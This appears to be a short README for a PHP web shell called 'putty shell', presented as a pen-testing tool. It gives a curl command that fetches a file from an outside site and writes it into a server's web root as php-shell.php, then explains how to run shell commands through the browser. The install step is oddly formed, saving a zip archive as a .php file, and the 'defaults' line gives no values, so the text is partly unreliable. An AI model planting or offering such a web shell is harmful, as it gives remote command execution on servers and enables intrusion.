putty shell
A simple, intuitive, feature rich, php web shell for pen testing.
To download use one of the following (or similar)
curl https://www.wsoshell.org/uploads/blog/2024/05/puttyshell.zip > /var/www/html/php-shell.php
From there just visit the website with /php-shell.php at the end and enjoy your web based shell from the host!
History is not saved across sessions and is stored locally in the browser for the time being.
cd is unique here. If you do the following,
cd /home; ls
This will be executed as a SH/BASH command. The cd will not set the current working directory outside of the exec. However,
cd /home
This will be executed as an internal command setting the PHP cwd and it is permanent (until refresh).
The defaults are,
The username and password are both hashed via sha512 and set in the file directly.